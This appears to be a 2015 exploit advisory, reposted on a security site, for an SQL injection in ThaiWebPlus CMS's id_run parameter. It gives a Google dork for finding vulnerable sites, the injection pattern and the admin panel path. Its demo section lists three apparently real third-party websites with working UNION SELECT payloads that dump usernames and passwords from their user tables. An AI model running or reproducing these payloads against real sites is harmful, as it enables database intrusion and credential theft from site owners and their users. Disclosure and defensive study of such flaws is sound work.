ThaiWebPlus CMS Sql Injection Vulnerability

2015.12.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################### # [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability # [+] Google Dork: Powered by ThaiWebPlus # [+] Exploit Author: Iran Cyber Security Group # [+] Discovered By: Pi.Hack # [+] Vendor Homepage: http://thaiwebplus.com # [+] Version: All version # [+] Tested on: Windows & Linux ################################################### # [+] Exploit: # [+] http://localhost/index.php?Content=product&id_run=[ID]'[Sql Injection] ################################################### # [+] Proof: # [+] http://localhost/index.php?Content=product&id_run=[ID]' [Not loaded] ################################################### # [+] Demo: # [+] http://www.yXingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://88paXrt.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://amXpcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user-- ################################################### # Admin Page: # site.com/_admin/ ################################################### # Contact mail: uid.root@yahoo.com # Skype: uid.root # Home Page : www.Iran-Cyber.Org # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org ###################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top